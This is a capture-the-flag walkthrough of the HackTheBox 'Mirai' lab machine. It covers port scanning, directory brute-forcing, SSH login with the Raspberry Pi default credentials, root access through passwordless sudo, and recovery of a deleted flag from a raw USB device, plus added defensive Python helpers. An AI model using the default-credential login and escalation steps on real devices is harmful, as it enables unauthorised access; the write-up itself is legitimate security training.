Welcome to the Mirai writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Mirai
Tags: HTB, Easy, Linux, OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux
Enumeration
Nmap
To get started, we run a quick scan of all TCP ports to find the open ones.
$ nmap -p- -T4 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:19 CEST
Nmap scan report for 10.10.10.48
Host is up (0.096s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1536/tcp open ampr-inter
32400/tcp open plex
32469/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 61.16 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,53,80,1536,32400,32469 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:21 CEST
Nmap scan report for 10.10.10.48
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1536/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 96.63 ms 10.10.14.1
2 96.80 ms 10.10.10.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.90 seconds
Port 80
The web server on port 80 serves an empty page, so we brute-force directories.
Gobuster
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.48/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,zip,rar,tar,bak,php
[+] Timeout: 10s
===============================================================
2021/05/07 16:54:21 Starting gobuster
===============================================================
/admin (Status: 301)
/versions (Status: 200)
===============================================================
2021/05/07 16:59:07 Finished
===============================================================
Well, inside the admin directory we find a Pi-hole installation. Let's list again, this time against that directory.
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/admin/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.48/admin/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,zip,rar,tar,bak
[+] Timeout: 10s
===============================================================
2021/05/07 16:56:04 Starting gobuster
===============================================================
/LICENSE (Status: 200)
/api.php (Status: 200)
/debug.php (Status: 200)
/help.php (Status: 200)
/img (Status: 301)
/index.php (Status: 200)
/list.php (Status: 200)
/queries.php (Status: 200)
/scripts (Status: 301)
/settings.php (Status: 200)
/style (Status: 301)
===============================================================
2021/05/07 17:00:51 Finished
===============================================================
I don't find anything interesting... We have seen that DNS (port 53) is open, but searching the Pi-hole web interface and the Plex interface on port 32400 I have not found any domain name, so we add the domain mirai.htb to our /etc/hosts file and try accessing port 80 again.
This time we get a message telling us that this domain is restricted.
<script src="http://pi.hole/admin/scripts/pi-hole/js/queryads.js"></script>
But if we look at the page source we find a line that refers to the pi.hole domain, so we change mirai.htb to pi.hole in our hosts file.
And when accessing the domain... Surprise! We land on the same Pi-hole installation we had already found! 😂
After enumerating for a long time without finding anything, and knowing that Pi-hole is normally installed on a Raspberry Pi, we can look up the default SSH credentials for Raspberry Pi OS and test whether they still work.
An official Raspberry Pi post indicates that the default user is pi and the password is raspberry.
Exploitation
SSH
Testing with these credentials, we are in...
$ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ ls
background.jpg Desktop Documents Downloads Music oldconffiles Pictures Public python_games Templates Videos
pi@raspberrypi:~ $ cd Desktop/
pi@raspberrypi:~/Desktop $ ls
Plex user.txt
pi@raspberrypi:~/Desktop $ cat user.txt
CENSORED_FLAG
Post exploitation
Privilege escalation: pi to root
Sudo
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Really? Straight to root? I hope not!
pi@raspberrypi:~/Desktop $ sudo su
root@raspberrypi:/home/pi/Desktop# cd /root
root@raspberrypi:~# ls
root.txt
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Oh! Yes, we are root, but we still have to find the flag! That's good!
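The `sudo -l` output above is the kind of thing a defender wants to catch in an audit rather than in a writeup. The following is an added example (not code from the original post): it parses `sudo -l` output and flags entries that grant unrestricted commands as root, rating `NOPASSWD` grants as critical. The sample input is the output seen on this box, embedded inline.

```python
import re

# Constructed sample: the `sudo -l` output from the box, embedded inline.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

# One privilege line: "(runas[:rungroup]) [TAG: ...] cmd1, cmd2, ..."
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudo_l(text):
    """Return (runas, tags, commands) tuples from `sudo -l` output."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True          # everything after this header is a grant
            continue
        if not in_cmds:
            continue                # skip the Defaults block
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            cmds = [c.strip() for c in m.group("cmds").split(",")]
            entries.append((m.group("runas").strip(), tags, cmds))
    return entries

def risky_entries(entries):
    """Flag grants of ALL commands runnable as root (or as any user)."""
    findings = []
    for runas, tags, cmds in entries:
        unrestricted = "ALL" in cmds
        root_capable = runas.split(":")[0].strip() in ("ALL", "root")
        if unrestricted and root_capable:
            severity = "critical" if "NOPASSWD" in tags else "high"
            findings.append((severity, runas, tags, cmds))
    return findings

if __name__ == "__main__":
    for sev, runas, tags, cmds in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{sev}] ({runas}) {' '.join(tags)} {', '.join(cmds)}")
```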
Finding root flag
By listing the storage devices we can see that there is a secondary device called sdb.
root@raspberrypi:~# ls /dev/sd*
/dev/sda /dev/sda1 /dev/sda2 /dev/sdb
Checking the mount table, we can see that the device is mounted read-only on /media/usbstick.
root@raspberrypi:~# mount | grep sdb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
Let's see what it contains.
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Did you delete my flag? Clumsy...
Let's try to get it back.
root@raspberrypi:~# grep -a -C 500 'root.txt' /dev/sdb > /tmp/recover
root@raspberrypi:~# strings /tmp/recover
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
CENSORED_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Because grep -a treats the raw block device as text and -C 500 prints 500 lines of context around each match, the deleted file's data block, which still sits in the unallocated space of the ext4 volume until it is overwritten, comes back together with the directory entries that name it. Among the strings it returns, we have the root flag.
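The same recovery, as an added example that is not part of the original writeup: it scans a raw device or image for a marker in chunks, keeps an overlap so a marker that straddles a chunk boundary is still found (the case a naive chunked search misses), and runs a strings(1)-style extraction over the context window, just as `grep -a -C ... | strings` does above. The image it scans is constructed in-memory and is not a real ext4 filesystem; the flag value in it is a placeholder.

```python
import io
import re

def strings(data, minlen=4):
    """Like strings(1): runs of printable ASCII at least minlen long."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]

def find_marker_context(stream, marker, context=4096, chunk=65536):
    """Scan a raw device/image for marker; return (offset, surrounding bytes) pairs.
    A len(marker)-1 overlap is kept between chunks so a marker that straddles
    a chunk boundary is still found."""
    hits, offset, tail = [], 0, b""
    while True:
        data = stream.read(chunk)
        if not data:
            break
        buf, base = tail + data, offset - len(tail)   # buf starts at file offset base
        i = buf.find(marker)
        while i >= 0:
            hits.append(base + i)
            i = buf.find(marker, i + 1)
        tail = buf[-(len(marker) - 1):] if len(marker) > 1 else b""
        offset += len(data)
    results = []
    for pos in hits:                                  # pull the context window per hit
        stream.seek(max(0, pos - context))
        results.append((pos, stream.read(2 * context + len(marker))))
    return results

def build_sample_image():
    """Constructed image (not a real ext4 filesystem): only the byte layout the
    recovery relies on, i.e. a directory block naming root.txt and, later,
    the still-present data block of the deleted file."""
    img = bytearray(1024)
    dirent = b"lost+found\x00root.txt\x00damnit.txt\x00"
    img[49:49 + len(dirent)] = dirent          # "root.txt" lands on bytes 60..67
    flag = b"EXAMPLE_FLAG_NOT_REAL_0123\n"       # constructed placeholder, not the box's flag
    img[512:512 + len(flag)] = flag
    note = b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    img[640:640 + len(note)] = note
    return bytes(img)

def recover(image, marker=b"root.txt", context=600, chunk=64):
    """Equivalent of `grep -a -C ... | strings` over an in-memory image.
    chunk=64 is deliberately tiny so the sample marker straddles a boundary."""
    stream = io.BytesIO(image)
    return [(pos, strings(win)) for pos, win in find_marker_context(stream, marker, context, chunk)]
```

On a real device, replace the BytesIO with `open("/dev/sdb", "rb")` and a normal chunk size; the context window is then the analogue of `-C 500`.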